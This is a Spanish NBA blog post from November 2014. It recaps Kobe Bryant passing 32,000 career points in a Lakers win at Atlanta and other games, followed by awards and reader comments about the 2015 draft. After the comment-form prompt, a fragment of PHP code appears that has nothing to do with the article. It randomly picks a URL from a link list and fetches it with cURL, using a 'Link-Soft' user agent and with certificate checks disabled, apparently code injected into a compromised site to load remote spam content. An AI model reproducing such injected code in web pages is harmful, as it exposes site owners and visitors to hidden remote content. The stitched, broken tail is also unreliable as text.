La crónica: Kobe entra en la eternidad

19 de November de 2014 por FranGuaita

Necesitaba 27 puntos para acceder al selecto club de los 32.000 puntos (Kareem Abdul-Jabbar, Karl Malone, Michael Jordan)… y metió 28. El último, con un and one estratosférico a escasos milímetros de la asfixiante defensa de Thabo Sefolosha. Un tiro celestial que sirvió para certificar el segundo triunfo de la temporada para Lakers, el primero lejos del Staples. Larga vida al 24.

kobe_atlanta

Atlanta Hawks 109 – L.A. Lakers 114

Comenzar la temporada con un paupérrimo balance de 1-9 tiene sus ventajas. La noche menos pensada, el equipo que se enfrenta a una banda como hasta ayer había sido Lakers sale a la pista pensando que puede ganar sin bajar del autobús. Un imperdonable exceso de confianza si enfrente juega un señor llamado Kobe Bryant. Para ser justos, vaya por delante que Black Mamba no estuvo solo en el Philips Arena. Cuatro de sus escuderos -generalmente incapaces de ver aro- se dispararon hasta las dobles figuras: Boozer (20), Hill (18), Young (17) y Lin (15). El plan B en ataque de Byron Scott sí funcionó en esta ocasión. Atlanta, eso sí, puso mucho de su parte. Fundamentalmente en la primera mitad, consintiendo 67 puntos a base de una defensa visual que despertó la úlcera de Mike Budenholzer. En el arranque del último cuarto -con los Hawks metidos de lleno en la Operación Remontada- el inalámbrico de la Fox entrevistaba a Tracy McGrady, presente en la ciudad “por negocios”. Preguntado por las opciones de Atlanta de consumar su comeback, T-Mac ejerció de visionario: “Cuando Kobe vuelva a pista, va a buscar sus tiros. Querrá ganar este partido”. Y lo ganó. Agigantando su leyenda, además. Está a 291 puntos de Jordan. Al ritmo que va, la segunda semana de diciembre podemos tener otra madrugada histórica. A falta de anillos…

Milwaukee Bucks 117 – NY Knicks 113

Jason Kidd tuvo que recurrir a la fiabilidad de Jerryd Bayless desde el tiro libre para cerrar un partido que tenía sentenciado con un plácido +26 y que New York pudo llevarse más por la autocomplacencia de Milwaukee que por otras cuestiones. Novena derrota de los Knicks en doce partidos de regular season. Y más de lo mismo. Muchos problemas detrás (66 puntos encajados al descanso) y excesiva previsibilidad delante donde Melo es la primera opción, pero necesita la aparición de actores secundarios. Tim Hardaway Jr. presentó anoche su candidatura en el BMO Harris Bradley Center. Una serie de 9-13 en tiros de campo para 24 puntos. La gran mayoría, eso sí, ante la segunda unidad de los Bucks. En la franquicia de Wisconsin, otra de esas noches corales en ataque con siete jugadores por encima de los diez puntos. Pese al doble doble de Zaza Pachulia (14 puntos, 13 rebotes), el hombre con mayúsculas fue Ilyasova. El 4×4 turco tuvo uno de esos días: 8-10 en tiros de campo y 20 puntos desde el banquillo. Muy mal debe hacer las cosas Milwaukee para no jugar playoffs cuando llegue mayo.

Resto de la jornada

En Utah, los locales tuvieron que remontar 17 puntos para imponerse a los Thunder. El marcador final (81-98, un +17 para los Jazz) se explica a través de los parciales en los dos cuartos intermedios, en el que el equipo dirigido por Quin Snyder arrasó con Burks & Burke liderando la carga. Más ajustado fue el triunfo de los Pelicans sobre los Kings, con Anthony Davis en sus ridículamente espectaculares números de costumbre. No se quedó atrás Cousins, que protagonizó una batalla tremenda con Davis, pero la excelente segunda mitad de Tyreke Evans y Ryan Anderson decantó la balanza del lado de NO (106-100).

PREMIOS

MVP: De manera casi rutinaria, Anthony Davis sigue haciendo barbaridades y lleva camino de ser el primero en la historia en liderar las categorías de robos y tapones. Anoche, 28 puntos, 9 rebotes, 2 robos y 3 tapones de The Brow. Los mismos puntos logró Kobe (para hacer historia al superar los 32.000), acompañados de 4 rebotes, 3 asistencias y primera victoria visitante de los Lakers esta temporada.

adavis_kings

Rookie: Buenos minutos de Dante Exum para 9 puntos (3/5 triples) y 5 asistencias sin pérdidas. Jabari Parker anotó 12 puntos y atrapó 5 rebotes.

Sorpresa: Alec Burks se destapó con su mejor partido en lo que va de curso. 20 puntos, 14 rebotes, 3 asistencias y 2 tapones del de los Jazz en la victoria frente a Thunder. Anoche también se produjo uno de esos extraños casos de avistamiento de Ilyasova: 20 puntos en 20 minutos del turco contra los Knicks.

Decepción: 6 puntos, 6 rebotes y 1 tapón es todo lo que aportó Serge Ibaka anoche. Su bajo rendimiento no está siendo un caso aislado en este inicio de campaña, en el que esperábamos que diese un paso adelante ante las bajas de su equipo.

Mayor esfuerzo en vano: Imparable una noche más DeMarcus Cousins, autor de 24 puntos y 17 rebotes en la derrota de los Kings. También están en un gran momento Melo Anthony e Iman Shumpert (47 puntos, 14 rebotes, 13 asistencias entre ambos ante los Bucks) pese a que los Knicks no encuentran su rumbo. Y Paul Millsap hizo lo que quiso con Carlos Boozer y mantuvo a los Hawks en el partido con sus 29 puntos, 4 rebotes, 3 asistencias, 4 robos y 2 tapones.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    ¿Alguien puede ilustrarme de como viene de fuerte el Draft ’15? Gracias.

      Citar

  2. Futurman dice:
    #2

    Pues por ahora hay un pivot potente, Okafor, y un chaval que juega en china, Mudiay, que es el que tiene más talento.

      Citar

  3. Denise dice:
    #3

    Futurman:
    Pues por ahora hay un pivot potente, Okafor, y un chaval que juega en china, Mudiay, que es el que tiene más talento.

    Ok Gracias, y algunas comparaciones?? Potente como O’neal ó como Emeka Okafor, talento como Bryant ó como Jodie Meeks, jeje.
    Y de Willie Cauley-Stein se sabe algo…Ese tio debe ser importante para el próximo Draft no? Lo ví un par de veces el año pasado en la NCAA y me parecia una bestia importante para intimidar.

      Citar

  4. MagicJohnson32 dice:
    #4

    Precisamente anoche vi por primera vez a Okafor mientras hacía tiempo antes del Lakers-Hawks, y en ese rato el chaval hizo 4/4 con mucha sensación de superioridad. Ágil, corre bien, juega de espaldas al aro, fantástico en el pick & roll… Ya te digo que fueron sólo unos minutos pero la impresión es que tiene el físico y el talento.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>